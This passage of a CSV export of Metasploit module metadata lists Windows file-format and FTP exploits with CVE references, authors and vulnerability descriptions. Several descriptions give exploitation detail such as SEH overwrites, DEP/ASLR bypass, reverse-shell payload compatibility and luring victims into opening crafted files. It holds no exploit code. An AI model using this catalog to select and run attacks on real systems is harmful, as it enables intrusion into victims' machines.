This control is not marked safe for scripting, please choose your attack vector carefully.","Metasploit Framework License (BSD)","f","2008-12-29 00:00:00",0,,"aggressive","t","BID-33053, CVE-2008-6898, OSVDB-55945","dean " 675,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/scadaphone_zip.rb","exploit","windows/fileformat/scadaphone_zip","exploit/windows/fileformat/scadaphone_zip","ScadaTEC ScadaPhone <= v5.3.11.1230 Stack Buffer Overflow",400,"This module exploits a stack-based buffer overflow vulnerability in version 5.3.11.1230 of scadaTEC's ScadaPhone. In order for the command to be executed, an attacker must convince someone to load a specially crafted project zip file with ScadaPhone. By doing so, an attacker can execute arbitrary code as the victim user.","Metasploit Framework License (BSD)","f","2011-09-12 00:00:00",0,,"aggressive","t","CVE-2011-4535, EDB-17817, OSVDB-75375, URL-http://www.scadatec.com/","mr_me " 676,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb","exploit","windows/fileformat/shadow_stream_recorder_bof","exploit/windows/fileformat/shadow_stream_recorder_bof","Shadow Stream Recorder 3.0.1.7 Buffer Overflow",300,"This module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7. Using the application to open a specially crafted asx file, a buffer overflow may occur to allow arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2010-03-29 00:00:00",0,,"aggressive","t","BID-34864, EDB-11957","AlpHaNiX , b0telh0 " 677,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/somplplayer_m3u.rb","exploit","windows/fileformat/somplplayer_m3u","exploit/windows/fileformat/somplplayer_m3u","S.O.M.P.L 1.0 Player Buffer Overflow",500,"This module exploits a buffer overflow in Simple Open Music Player v1.0. 
When the application is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2010-01-22 00:00:00",0,,"aggressive","t","EDB-11219, OSVDB-64368","Rick2600, dookie" 678,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb","exploit","windows/fileformat/subtitle_processor_m3u_bof","exploit/windows/fileformat/subtitle_processor_m3u_bof","Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow",300,"This module exploits a vulnerability found in Subtitle Processor 7. By supplying a long string of data as a .m3u file, Subtitle Processor first converts this input in Unicode, which expands the string size, and then attempts to copy it inline on the stack. This results a buffer overflow with SEH overwritten, allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-04-26 00:00:00",0,,"aggressive","t","EDB-17217, URL-http://sourceforge.net/projects/subtitleproc/","Brandon Murphy, sinn3r " 679,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb","exploit","windows/fileformat/tfm_mmplayer_m3u_ppl_bof","exploit/windows/fileformat/tfm_mmplayer_m3u_ppl_bof","TFM MMPlayer (m3u/ppl File) Buffer Overflow",400,"This module exploits a buffer overflow in MMPlayer 2.2 The vulnerability is triggered when opening a malformed M3U/PPL file that contains an overly long string, which results in overwriting a SEH record, thus allowing arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-03-23 00:00:00",0,,"aggressive","t","BID-52698, EDB-18656, EDB-18657, OSVDB-80532","Brendan Coles , RjRjh Hack3r" 680,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/tugzip.rb","exploit","windows/fileformat/tugzip","exploit/windows/fileformat/tugzip","TugZip 3.5 Zip File 
Parsing Buffer Overflow Vulnerability",400,"This module exploits a stack-based buffer overflow vulnerability in the latest version 3.5 of TugZip archiving utility. In order to trigger the vulnerability, an attacker must convince someone to load a specially crafted zip file with TugZip by double click or file open. By doing so, an attacker can execute arbitrary code as the victim user.","Metasploit Framework License (BSD)","f","2008-10-28 00:00:00",0,,"aggressive","t","BID-31913, CVE-2008-4779, EDB-12008, OSVDB-49371","Lincoln, Stefan Marin, TecR0c , mr_me " 681,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ultraiso_ccd.rb","exploit","windows/fileformat/ultraiso_ccd","exploit/windows/fileformat/ultraiso_ccd","UltraISO CCD File Parsing Buffer Overflow",500,"This module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CCD files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an CCD file. NOTE: A file with the same base name, but the extension of ""img"" must also exist. Opening either file will trigger the vulnerability, but the files must both exist.","Metasploit Framework License (BSD)","f","2009-04-03 00:00:00",0,,"aggressive","t","BID-34363, BID-38613, CVE-2009-1260, EDB-8343, OSVDB-53275","jduck " 682,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ultraiso_cue.rb","exploit","windows/fileformat/ultraiso_cue","exploit/windows/fileformat/ultraiso_cue","UltraISO CUE File Parsing Buffer Overflow",500,"This module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CUE files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. 
Attackers can execute arbitrary code by convincing their victim to open an CUE file. NOTE: A file with the same base name, but the extension of ""bin"" must also exist. Opening either file will trigger the vulnerability, but the files must both exist.","Metasploit Framework License (BSD)","f","2007-05-24 00:00:00",0,,"aggressive","t","BID-24140, CVE-2007-2888, EDB-3978, OSVDB-36570","jduck , n00b" 683,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ursoft_w32dasm.rb","exploit","windows/fileformat/ursoft_w32dasm","exploit/windows/fileformat/ursoft_w32dasm","URSoft W32Dasm Disassembler Function Buffer Overflow",400,"This module exploits a buffer overflow in W32Dasm <= v8.93. By creating a malicious file and convincing a user to disassemble the file with a vulnerable version of W32Dasm, the Imports/Exports function is copied to the stack and arbitrary code may be executed locally as the user.","Metasploit Framework License (BSD)","f","2005-01-24 00:00:00",0,,"aggressive","t","BID-12352, CVE-2005-0308, OSVDB-13169, URL-http://aluigi.altervista.org/adv/w32dasmbof-adv.txt","patrick " 684,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/varicad_dwb.rb","exploit","windows/fileformat/varicad_dwb","exploit/windows/fileformat/varicad_dwb","VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN. An attacker must send the file to victim and the victim must open the file.","Metasploit Framework License (BSD)","f","2010-03-17 00:00:00",0,,"aggressive","t","BID-38815, EDB-11789, OSVDB-63067","MC , dookie, jduck , n00b" 685,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/videolan_tivo.rb","exploit","windows/fileformat/videolan_tivo","exploit/windows/fileformat/videolan_tivo","VideoLAN VLC TiVo Buffer Overflow",400,"This module exploits a buffer overflow in VideoLAN VLC 0.9.4. 
By creating a malicious TY file, a remote attacker could overflow a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-10-22 00:00:00",0,,"aggressive","t","BID-31813, CVE-2008-4654, OSVDB-49181","MC " 686,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/videospirit_visprj.rb","exploit","windows/fileformat/videospirit_visprj","exploit/windows/fileformat/videospirit_visprj","VeryTools Video Spirit Pro <= 1.70",400,"This module exploits a stack buffer overflow in Video Spirit <= 1.70. When opening a malicious project file (.visprj), a stack buffer overflow occurs, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.","Metasploit Framework License (BSD)","f","2011-04-11 00:00:00",0,,"aggressive","t","CVE-2011-0499, CVE-2011-0500, OSVDB-70619, URL-http://www.corelan.be/advisories.php?id=CORELAN-11-001","Acidgen, corelanc0d3r " 687,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/visio_dxf_bof.rb","exploit","windows/fileformat/visio_dxf_bof","exploit/windows/fileformat/visio_dxf_bof","Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability",400,"This module exploits a stack based overflow vulnerability in the handling of the DXF files by Microsoft Visio 2002. Revisions prior to the release of the MS bulletin MS10-028 are vulnerable. The overflow occurs when the application is used to import a specially crafted DXF file, while parsing the HEADER section of the DXF file. 
To trigger the vulnerability an attacker must convince someone to insert a specially crafted DXF file to a new document, go to 'Insert' -> 'CAD Drawing'","Metasploit Framework License (BSD)","f","2010-05-04 00:00:00",,,"aggressive","t","BID-39836, CVE-2010-1681, OSVDB-64446, URL-http://www.coresecurity.com/content/ms-visio-dxf-buffer-overflow, URL-http://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/","CORE Security, Shahin Ramezany , juan vazquez " 688,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/visiwave_vwr_type.rb","exploit","windows/fileformat/visiwave_vwr_type","exploit/windows/fileformat/visiwave_vwr_type","VisiWave VWR File Parsing Vulnerability",500,"This module exploits a vulnerability found in VisiWave's Site Survey Report application. When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type' property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text', 'Image'), but if a match isn't found, the function that's supposed to handle this routine ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with any arbitrary value, and results code execution. A patch is available at visiwave.com; the fix is done by XORing the return value as null if no match is found, and then it is validated before use. NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a victim user to 'double click' the malicious VWR file and execute code. 
This module was also built to bypass ASLR and DEP.","Metasploit Framework License (BSD)","f","2011-05-20 00:00:00",0,,"aggressive","t","CVE-2011-2386, OSVDB-72464, URL-http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20, URL-http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html","TecR0c , mr_me " 689,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb","exploit","windows/fileformat/vlc_modplug_s3m","exploit/windows/fileformat/vlc_modplug_s3m","VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow",200,"This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR.","Metasploit Framework License (BSD)","f","2011-04-07 00:00:00",0,,"aggressive","t","CVE-2011-1574, OSVDB-72143, URL-http://hackipedia.org/File%20formats/Music/html/s3mformat.php, URL-http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b, URL-http://seclists.org/fulldisclosure/2011/Apr/113, URL-https://www.sec-consult.com/files/20110407-0_libmodplug_stackoverflow.txt","jduck " 690,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/vlc_realtext.rb","exploit","windows/fileformat/vlc_realtext","exploit/windows/fileformat/vlc_realtext","VLC Media Player RealText Subtitle Overflow",400,"This module exploits a stack buffer overflow vulnerability in VideoLAN VLC < 0.9.6. 
The vulnerability exists in the parsing of RealText subtitle files. In order to exploit this, this module will generate two files: The .mp4 file is used to trick your victim into running. The .rt file is the actual malicious file that triggers the vulnerability, which should be placed under the same directory as the .mp4 file.","Metasploit Framework License (BSD)","f","2008-11-05 00:00:00",0,,"aggressive","t","BID-32125, CVE-2008-5036, OSVDB-49809, URL-http://www.trapkit.de/advisories/TKADV2008-011.txt, URL-http://www.videolan.org/security/sa0810.html","SkD, Tobias Klein, juan vazquez " 691,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/vlc_smb_uri.rb","exploit","windows/fileformat/vlc_smb_uri","exploit/windows/fileformat/vlc_smb_uri","VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow",500,"This module exploits a stack-based buffer overflow in the Win32AddConnection function of the VideoLAN VLC media player. Versions 0.9.9 throught 1.0.1 are reportedly affected. This vulnerability is only present in Win32 builds of VLC. This payload was found to work with the windows/exec and windows/meterpreter/reverse_tcp payloads. However, the windows/meterpreter/reverse_ord_tcp was found not to work.","Metasploit Framework License (BSD)","f","2009-06-24 00:00:00",0,,"aggressive","t","BID-35500, CVE-2009-2484, EDB-9029, OSVDB-55509, URL-http://git.videolan.org/?p=vlc.git;a=commit;h=e60a9038b13b5eb805a76755efc5c6d5e080180f","jduck " 692,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/vlc_webm.rb","exploit","windows/fileformat/vlc_webm","exploit/windows/fileformat/vlc_webm","VideoLAN VLC MKV Memory Corruption",400,"This module exploits an input validation error in VideoLAN VLC < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker could execute arbitrary code. 
NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it.","Metasploit Framework License (BSD)","f","2011-01-31 00:00:00",0,,"aggressive","t","BID-46060, CVE-2011-0531, OSVDB-70698, URL-http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456, URL-http://www.videolan.org/security/sa1102.html","Dan Rosenberg" 693,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/vuplayer_cue.rb","exploit","windows/fileformat/vuplayer_cue","exploit/windows/fileformat/vuplayer_cue","VUPlayer CUE Buffer Overflow",400,"This module exploits a stack over flow in VUPlayer <= 2.49. When the application is used to open a specially crafted cue file, an buffer is overwritten allowing for the execution of arbitrary code.","Metasploit Framework License (BSD)","f","2009-08-18 00:00:00",0,,"aggressive","t","BID-33960, OSVDB-64581","MC " 694,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/vuplayer_m3u.rb","exploit","windows/fileformat/vuplayer_m3u","exploit/windows/fileformat/vuplayer_m3u","VUPlayer M3U Buffer Overflow",400,"This module exploits a stack over flow in VUPlayer <= 2.49. When the application is used to open a specially crafted m3u file, an buffer is overwritten allowing for the execution of arbitrary code.","Metasploit Framework License (BSD)","f","2009-08-18 00:00:00",0,,"aggressive","t","CVE-2006-6251, OSVDB-31710","MC " 695,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/winamp_maki_bof.rb","exploit","windows/fileformat/winamp_maki_bof","exploit/windows/fileformat/winamp_maki_bof","Winamp MAKI Buffer Overflow",300,"This module exploits a stack based buffer overflow in Winamp 5.55. 
The flaw exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file, where memmove is used with in a insecure way with user controlled data. To exploit the vulnerability the attacker must convince the attacker to install the generated mcvcore.maki file in the ""scripts"" directory of the default ""Bento"" skin, or generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.","Metasploit Framework License (BSD)","f","2009-05-20 00:00:00",0,,"aggressive","t","BID-35052, CVE-2009-1831, EDB-8767, EDB-8770, EDB-8772, EDB-8783, OSVDB-54902, URL-http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html","Monica Sojeong Hong, juan vazquez " 696,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/wireshark_packet_dect.rb","exploit","windows/fileformat/wireshark_packet_dect","exploit/windows/fileformat/wireshark_packet_dect","Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (local)",400,"This module exploits a stack buffer overflow in Wireshark <= 1.4.4 When opening a malicious .pcap file in Wireshark, a stack buffer occurs, resulting in arbitrary code execution. Note: To exploit the vulnerability remotely with Scapy: sendp(rdpcap(""file""))","Metasploit Framework License (BSD)","f","2011-04-18 00:00:00",0,,"aggressive","t","CVE-2011-1591, EDB-17185, OSVDB-71848, URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836, URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838","Paul Makowski, corelanc0d3r , sickness" 697,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/wm_downloader_m3u.rb","exploit","windows/fileformat/wm_downloader_m3u","exploit/windows/fileformat/wm_downloader_m3u","WM Downloader 3.1.2.2 Buffer Overflow",300,"This module exploits a buffer overflow in WM Downloader v3.1.2.2. 
When the application is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2010-07-28 00:00:00",0,,"aggressive","t","EDB-14497, OSVDB-66911","dookie, fdisk" 698,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb","exploit","windows/fileformat/xenorate_xpl_bof","exploit/windows/fileformat/xenorate_xpl_bof","Xenorate 2.50 (.xpl) universal Local Buffer Overflow (SEH)",500,"This module exploits a stack buffer overflow in Xenorate 2.50 by creating a specially crafted xpl file.","Metasploit Framework License (BSD)","f","2009-08-19 00:00:00",0,,"aggressive","t","EDB-10371, OSVDB-57162","germaya_x, hack4love , jduck , loneferret" 699,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb","exploit","windows/fileformat/xion_m3u_sehbof","exploit/windows/fileformat/xion_m3u_sehbof","Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in Xion Audio Player prior to version 1.0.126. The vulnerability is triggered when opening a malformed M3U file that contains an overly long string. This results in overwriting a structured exception handler record.","Metasploit Framework License (BSD)","f","2010-11-23 00:00:00",0,,"aggressive","t","EDB-14517, EDB-14633, EDB-15598, OSVDB-66912","corelanc0d3r , digital1, hadji samir , jduck , m_101" 700,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb","exploit","windows/fileformat/xradio_xrl_sehbof","exploit/windows/fileformat/xradio_xrl_sehbof","xRadio 0.95b Buffer Overflow",300,"This module exploits a buffer overflow in xRadio 0.95b. 
Using the application to import a specially crafted xrl file, a buffer overflow occurs allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-02-08 00:00:00",0,,"aggressive","t","BID-46290, CVE-2008-2789, EDB-16141","b0telh0 " 701,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb","exploit","windows/fileformat/zinfaudioplayer221_pls","exploit/windows/fileformat/zinfaudioplayer221_pls","Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow",400,"This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extention is registered to Zinf. This functionality has not been tested in this module.","Metasploit Framework License (BSD)","f","2004-09-24 00:00:00",0,,"aggressive","t","BID-11248, CVE-2004-0964, EDB-7888, OSVDB-10416","Trancek , patrick " 702,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/firewall/blackice_pam_icq.rb","exploit","windows/firewall/blackice_pam_icq","exploit/windows/firewall/blackice_pam_icq","ISS PAM.dll ICQ Parser Buffer Overflow",500,"This module exploits a stack buffer overflow in the ISS products that use the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation will result in arbitrary code execution as LocalSystem. This exploit only requires 1 UDP packet, which can be both spoofed and sent to a broadcast address. 
The ISS exception handler will recover the process after each overflow, giving us the ability to bruteforce the service and exploit it multiple times.","Metasploit Framework License (BSD)","f","2004-03-18 00:00:00",0,,"aggressive","t","CVE-2004-0362, OSVDB-4355, URL-http://www.eeye.com/html/Research/Advisories/AD20040318.html, URL-http://xforce.iss.net/xforce/alerts/id/166","spoonm " 703,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/firewall/kerio_auth.rb","exploit","windows/firewall/kerio_auth","exploit/windows/firewall/kerio_auth","Kerio Firewall 2.1.4 Authentication Packet Overflow",200,"This module exploits a stack buffer overflow in Kerio Personal Firewall administration authentication process. This module has only been tested against Kerio Personal Firewall 2 (2.1.4).","Metasploit Framework License (BSD)","t","2003-04-28 00:00:00",0,,"aggressive","t","BID-7180, CVE-2003-0220, OSVDB-6294, URL-http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10","MC " 704,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/32bitftp_list_reply.rb","exploit","windows/ftp/32bitftp_list_reply","exploit/windows/ftp/32bitftp_list_reply","32bit FTP Client Stack Buffer Overflow ",400,"This module exploits a stack buffer overflow in 32bit ftp client, triggered when trying to download a file that has an overly long filename.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r , fancy" 705,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb","exploit","windows/ftp/3cdaemon_ftp_user","exploit/windows/ftp/3cdaemon_ftp_user","3Com 3CDaemon 2.0 FTP Username Overflow",200,"This module exploits a vulnerability in the 3Com 3CDaemon FTP service. This package is being distributed from the 3Com web site and is recommended in numerous support documents. 
This module uses the USER command to trigger the overflow.","Metasploit Framework License (BSD)","f","2005-01-04 00:00:00",,,"aggressive","t","BID-12155, CVE-2005-0277, OSVDB-12810, OSVDB-12811, URL-ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip","hdm , otr" 706,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/aasync_list_reply.rb","exploit","windows/ftp/aasync_list_reply","exploit/windows/ftp/aasync_list_reply","AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)",400,"This module exploits a stack buffer overflow in AASync v2.2.1.0, triggered when processing the response on a LIST command. During the overflow, a structured exception handler record gets overwritten.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r " 707,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/ability_server_stor.rb","exploit","windows/ftp/ability_server_stor","exploit/windows/ftp/ability_server_stor","Ability Server 2.34 STOR Command Stack Buffer Overflow",300,"This module exploits a stack-based buffer overflow in Ability Server 2.34. Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands, which leads to a stack based buffer overflow. This plugin uses the 'STOR' command. The vulnerability has been confirmed on version 2.34 and has also been reported in version 2.25 and 2.32. 
Other versions may also be affected.","Metasploit Framework License (BSD)","f","2004-10-22 00:00:00",,,"aggressive","t","CVE-2004-1626, EDB-588, OSVDB-11030","Dark Eagle, Peter Osterberg, muts" 708,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb","exploit","windows/ftp/absolute_ftp_list_bof","exploit/windows/ftp/absolute_ftp_list_bof","AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow",300,"This module exploits VanDyke Software AbsoluteFTP by overflowing a filename buffer related to the LIST command.","Metasploit Framework License (BSD)","f","2011-11-09 00:00:00",0,,"passive","t","CVE-2011-5164, EDB-18102, OSVDB-77105","Node" 709,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/cesarftp_mkd.rb","exploit","windows/ftp/cesarftp_mkd","exploit/windows/ftp/cesarftp_mkd","Cesar FTP 0.99g MKD Command Buffer Overflow",200,"This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g. You must have valid credentials to trigger this vulnerability. Also, you only get one chance, so choose your target carefully.","Metasploit Framework License (BSD)","t","2006-06-12 00:00:00",0,,"aggressive","t","BID-18586, CVE-2006-2961, OSVDB-26364, URL-http://secunia.com/advisories/20574/","MC " 710,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb","exploit","windows/ftp/comsnd_ftpd_fmtstr","exploit/windows/ftp/comsnd_ftpd_fmtstr","ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability",400,"This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially crafted format string specifier as a username. The crafted username is sent to to the server to overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code. 
The SEH exit function is preferred so that the administrators are not left with an unhandled exception message. When using the meterpreter payload, the process will never die, allowing for continuous exploitation.","Metasploit Framework License (BSD)","f","2012-06-08 00:00:00",,,"aggressive","t","EDB-19024, OSVDB-82798","ChaoYi Huang , corelanc0d3r , mr_me , rick2600 " 711,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/dreamftp_format.rb","exploit","windows/ftp/dreamftp_format","exploit/windows/ftp/dreamftp_format","BolinTech Dream FTP Server 1.02 Format String",400,"This module exploits a format string overflow in the BolinTech Dream FTP Server version 1.02. Based on the exploit by SkyLined.","Metasploit Framework License (BSD)","f","2004-03-03 00:00:00",0,,"aggressive","t","BID-9800, CVE-2004-2074, EDB-823, OSVDB-4986","patrick " 712,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/easyfilesharing_pass.rb","exploit","windows/ftp/easyfilesharing_pass","exploit/windows/ftp/easyfilesharing_pass","Easy File Sharing FTP Server 2.0 PASS Overflow",200,"This module exploits a stack buffer overflow in the Easy File Sharing 2.0 service. By sending an overly long password, an attacker can execute arbitrary code.","Metasploit Framework License (BSD)","t","2006-07-31 00:00:00",0,,"aggressive","t","BID-19243, CVE-2006-3952, OSVDB-27646","MC " 713,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb","exploit","windows/ftp/easyftp_cwd_fixret","exploit/windows/ftp/easyftp_cwd_fixret","EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which leads to a stack based buffer overflow. 
EasyFTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability. After version 1.7.0.12, this package was renamed ""UplusFtp"". This exploit utilizes a small piece of code that I've referred to as 'fixRet'. This code allows us to inject a payload of ~500 bytes into a 264 byte buffer by 'fixing' the return address post-exploitation. See references for more information.","Metasploit Framework License (BSD)","f","2010-02-16 00:00:00",0,,"aggressive","t","BID-38262, OSVDB-62134, URL-http://code.google.com/p/easyftpsvr/, URL-http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/, URL-http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit, URL-http://seclists.org/bugtraq/2010/Feb/202, URL-https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip","Paul Makowski , jduck " 714,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/easyftp_list_fixret.rb","exploit","windows/ftp/easyftp_list_fixret","exploit/windows/ftp/easyftp_list_fixret","EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11. Credit goes to Karn Ganeshan. NOTE: Although this is likely to exploit the same vulnerability as the 'easyftp_cwd_fixret' exploit, it uses a slightly different vector.","Metasploit Framework License (BSD)","f","2010-07-05 00:00:00",0,,"aggressive","t","EDB-14400, EDB-14451, OSVDB-62134","Karn Ganeshan , MFR, jduck " 715,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb","exploit","windows/ftp/easyftp_mkd_fixret","exploit/windows/ftp/easyftp_mkd_fixret","EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow",500,"This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. 
EasyFTP fails to check input size when parsing 'MKD' commands, which leads to a stack based buffer overflow. NOTE: EasyFTP allows anonymous access by default. However, in order to access the 'MKD' command, you must have access to an account that can create directories. After version 1.7.0.12, this package was renamed ""UplusFtp"". This exploit utilizes a small piece of code that I've referred to as 'fixRet'. This code allows us to inject a payload of ~500 bytes into a 264 byte buffer by 'fixing' the return address post-exploitation. See references for more information.","Metasploit Framework License (BSD)","f","2010-04-04 00:00:00",0,,"aggressive","t","EDB-12044, EDB-14399, OSVDB-62134","jduck , x90c " 716,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/filecopa_list_overflow.rb","exploit","windows/ftp/filecopa_list_overflow","exploit/windows/ftp/filecopa_list_overflow","FileCopa FTP Server pre 18 Jul Version",200,"This module exploits the buffer overflow found in the LIST command in fileCOPA FTP server pre 18 Jul 2006 version discovered by 